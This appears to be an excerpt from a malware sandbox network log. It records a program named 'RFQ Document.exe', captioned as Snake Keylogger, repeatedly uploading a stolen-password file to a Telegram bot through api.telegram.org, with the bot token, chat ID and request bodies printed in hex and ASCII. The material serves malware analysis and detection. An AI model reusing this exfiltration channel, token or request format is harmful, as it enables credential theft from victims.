                                            2021-09-28 05:58:57 UTC188OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 37 38 32 31 38 32 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255d7821822Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:57 UTC189INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:57 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:57 UTC189INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 30 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 33 37 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12703,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808737,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            119192.168.2.449918149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:57 UTC190OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255d7a83f75
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:57 UTC190OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 37 61 38 33 66 37 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255d7a83f75Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:57 UTC190INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:57 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:57 UTC191INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 30 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 33 37 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12704,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808737,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            12192.168.2.449786149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:23 UTC18OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c33e2121
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:23 UTC19OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 33 33 65 32 31 32 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c33e2121Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:23 UTC19INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:23 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:23 UTC20INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 35 39 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 33 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12591,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808703,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            120192.168.2.449919149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:57 UTC191OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255d7d7ede1
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:57 UTC192OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 37 64 37 65 64 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255d7d7ede1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:57 UTC192INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:57 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:57 UTC192INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 30 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 33 37 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12706,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808737,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            121192.168.2.449920149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:57 UTC193OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255d7f489d9
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:57 UTC193OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 37 66 34 38 39 64 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255d7f489d9Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:57 UTC194INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:57 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:57 UTC194INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 30 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 33 37 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12707,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808737,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            122192.168.2.449921149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:57 UTC195OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255d80c5fc7
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:57 UTC195OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 38 30 63 35 66 63 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255d80c5fc7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:58 UTC195INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:58 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:58 UTC196INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 30 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 33 38 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12708,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808738,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            123192.168.2.449922149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:58 UTC196OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255d82436fb
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:58 UTC196OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 38 32 34 33 36 66 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255d82436fbContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:58 UTC197INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:58 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:58 UTC197INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 30 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 33 38 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12709,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808738,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            124192.168.2.449923149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:58 UTC198OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255d840d70d
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:58 UTC198OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 64 38 34 30 64 37 30 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
